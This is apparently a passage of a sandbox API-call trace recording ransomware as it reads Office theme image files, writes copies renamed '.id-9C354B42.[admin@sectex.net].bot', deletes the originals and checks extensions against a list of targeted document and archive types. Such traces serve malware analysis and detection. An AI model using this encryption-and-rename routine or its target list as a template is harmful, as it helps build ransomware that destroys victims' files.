	[0043.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 0x20
	[0043.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0043.032] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.032] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0043.033] GetLastError () returned 0x0
	[0043.033] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xaa2, lpOverlapped=0x0) returned 1
	[0043.035] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xab0, lpOverlapped=0x0) returned 1
	[0043.035] ReadFile (in: hFile=0x1b0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.035] WriteFile (in: hFile=0x1cc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0043.036] SetEndOfFile (hFile=0x1cc) returned 1
	[0043.036] CloseHandle (hObject=0x1cc) returned 1
	[0043.036] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.036] SetEndOfFile (hFile=0x1b0) returned 1
	[0043.037] CloseHandle (hObject=0x1b0) returned 1
	[0043.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.037] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 1
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.038] lstrlenW (lpString=".doc") returned 4
	[0043.038] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.038] lstrlenW (lpString=".docx") returned 5
	[0043.038] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.038] lstrlenW (lpString=".pdf") returned 4
	[0043.038] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.038] lstrlenW (lpString=".xls") returned 4
	[0043.038] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.038] lstrlenW (lpString=".xlsx") returned 5
	[0043.038] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.038] lstrlenW (lpString=".ppt") returned 4
	[0043.038] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.038] lstrlenW (lpString=".zip") returned 4
	[0043.038] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.038] lstrlenW (lpString=".rar") returned 4
	[0043.038] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.038] lstrlenW (lpString=".bz2") returned 4
	[0043.038] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.038] lstrlenW (lpString=".7z") returned 3
	[0043.038] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.038] lstrlenW (lpString=".dbf") returned 4
	[0043.038] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.038] lstrlenW (lpString=".1cd") returned 4
	[0043.038] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.038] lstrlenW (lpString=".jpg") returned 4
	[0043.038] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.039] lstrlenW (lpString=".doc") returned 4
	[0043.039] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0043.039] lstrlenW (lpString=".docx") returned 5
	[0043.039] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0043.039] lstrlenW (lpString=".pdf") returned 4
	[0043.039] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0043.039] lstrlenW (lpString=".xls") returned 4
	[0043.039] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0043.039] lstrlenW (lpString=".xlsx") returned 5
	[0043.039] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0043.039] lstrlenW (lpString=".ppt") returned 4
	[0043.039] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0043.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.039] lstrlenW (lpString=".zip") returned 4
	[0043.039] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0043.039] lstrlenW (lpString=".rar") returned 4
	[0043.039] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0043.039] lstrlenW (lpString=".bz2") returned 4
	[0043.039] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0043.039] lstrlenW (lpString=".7z") returned 3
	[0043.039] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0043.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.039] lstrlenW (lpString=".dbf") returned 4
	[0043.039] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0043.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.039] lstrlenW (lpString=".1cd") returned 4
	[0043.039] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0043.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74
	[0043.039] lstrlenW (lpString=".jpg") returned 4
	[0043.039] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0043.040] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.040] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.359] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=43276) returned 1
	[0043.359] CloseHandle (hObject=0x170) returned 1
	[0043.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 0x20
	[0043.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.360] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.360] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.360] GetLastError () returned 0x0
	[0043.360] ReadFile (in: hFile=0x170, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xa90c, lpOverlapped=0x0) returned 1
	[0043.406] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xa910, lpOverlapped=0x0) returned 1
	[0043.408] ReadFile (in: hFile=0x170, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.408] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.408] SetEndOfFile (hFile=0x1a8) returned 1
	[0043.408] CloseHandle (hObject=0x1a8) returned 1
	[0043.409] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.409] SetEndOfFile (hFile=0x170) returned 1
	[0043.410] CloseHandle (hObject=0x170) returned 1
	[0043.410] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.411] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\thmbnail.png")) returned 1
	[0043.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.411] lstrlenW (lpString=".doc") returned 4
	[0043.411] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.411] lstrlenW (lpString=".docx") returned 5
	[0043.411] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.411] lstrlenW (lpString=".pdf") returned 4
	[0043.411] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.411] lstrlenW (lpString=".xls") returned 4
	[0043.411] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.411] lstrlenW (lpString=".xlsx") returned 5
	[0043.411] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.411] lstrlenW (lpString=".ppt") returned 4
	[0043.411] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.411] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.411] lstrlenW (lpString=".zip") returned 4
	[0043.411] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.411] lstrlenW (lpString=".rar") returned 4
	[0043.411] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.411] lstrlenW (lpString=".bz2") returned 4
	[0043.411] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString=".7z") returned 3
	[0043.412] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.412] lstrlenW (lpString=".dbf") returned 4
	[0043.412] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.412] lstrlenW (lpString=".1cd") returned 4
	[0043.412] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.412] lstrlenW (lpString=".jpg") returned 4
	[0043.412] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.412] lstrlenW (lpString=".doc") returned 4
	[0043.412] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString=".docx") returned 5
	[0043.412] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.412] lstrlenW (lpString=".pdf") returned 4
	[0043.412] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString=".xls") returned 4
	[0043.412] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.412] lstrlenW (lpString=".xlsx") returned 5
	[0043.412] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.412] lstrlenW (lpString=".ppt") returned 4
	[0043.412] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.412] lstrlenW (lpString=".zip") returned 4
	[0043.412] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.412] lstrlenW (lpString=".rar") returned 4
	[0043.412] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.412] lstrlenW (lpString=".bz2") returned 4
	[0043.412] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.412] lstrlenW (lpString=".7z") returned 3
	[0043.413] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.413] lstrlenW (lpString=".dbf") returned 4
	[0043.413] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.413] lstrlenW (lpString=".1cd") returned 4
	[0043.413] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75
	[0043.413] lstrlenW (lpString=".jpg") returned 4
	[0043.413] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.413] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.413] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0043.413] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.413] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=32607) returned 1
	[0043.413] CloseHandle (hObject=0x170) returned 1
	[0043.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 0x20
	[0043.414] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0043.414] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.414] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.414] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0043.414] GetLastError () returned 0x0
	[0043.414] ReadFile (in: hFile=0x170, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x7f5f, lpOverlapped=0x0) returned 1
	[0043.422] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x7f60, lpOverlapped=0x0) returned 1
	[0043.423] ReadFile (in: hFile=0x170, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0043.423] WriteFile (in: hFile=0x1a8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0043.423] SetEndOfFile (hFile=0x1a8) returned 1
	[0043.423] CloseHandle (hObject=0x1a8) returned 1
	[0043.424] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0043.424] SetEndOfFile (hFile=0x170) returned 1
	[0043.425] CloseHandle (hObject=0x170) returned 1
	[0043.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0043.426] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1
	[0043.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.426] lstrlenW (lpString=".doc") returned 4
	[0043.426] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.426] lstrlenW (lpString=".docx") returned 5
	[0043.426] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.426] lstrlenW (lpString=".pdf") returned 4
	[0043.426] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.426] lstrlenW (lpString=".xls") returned 4
	[0043.426] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.426] lstrlenW (lpString=".xlsx") returned 5
	[0043.426] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.426] lstrlenW (lpString=".ppt") returned 4
	[0043.426] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.426] lstrlenW (lpString=".zip") returned 4
	[0043.426] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.426] lstrlenW (lpString=".rar") returned 4
	[0043.426] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.426] lstrlenW (lpString=".bz2") returned 4
	[0043.426] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.426] lstrlenW (lpString=".7z") returned 3
	[0043.426] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.426] lstrlenW (lpString=".dbf") returned 4
	[0043.427] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString=".1cd") returned 4
	[0043.427] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString=".jpg") returned 4
	[0043.427] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString=".doc") returned 4
	[0043.427] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString=".docx") returned 5
	[0043.427] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0043.427] lstrlenW (lpString=".pdf") returned 4
	[0043.427] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString=".xls") returned 4
	[0043.427] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0043.427] lstrlenW (lpString=".xlsx") returned 5
	[0043.427] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0043.427] lstrlenW (lpString=".ppt") returned 4
	[0043.427] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString=".zip") returned 4
	[0043.427] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0043.427] lstrlenW (lpString=".rar") returned 4
	[0043.427] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0043.427] lstrlenW (lpString=".bz2") returned 4
	[0043.427] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString=".7z") returned 3
	[0043.427] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString=".dbf") returned 4
	[0043.427] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0043.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.427] lstrlenW (lpString=".1cd") returned 4
	[0043.428] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0043.428] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75
	[0043.428] lstrlenW (lpString=".jpg") returned 4
	[0043.428] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0043.428] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0043.428] lstrlenW (lpString="THMBNAIL.PNG") returned 12
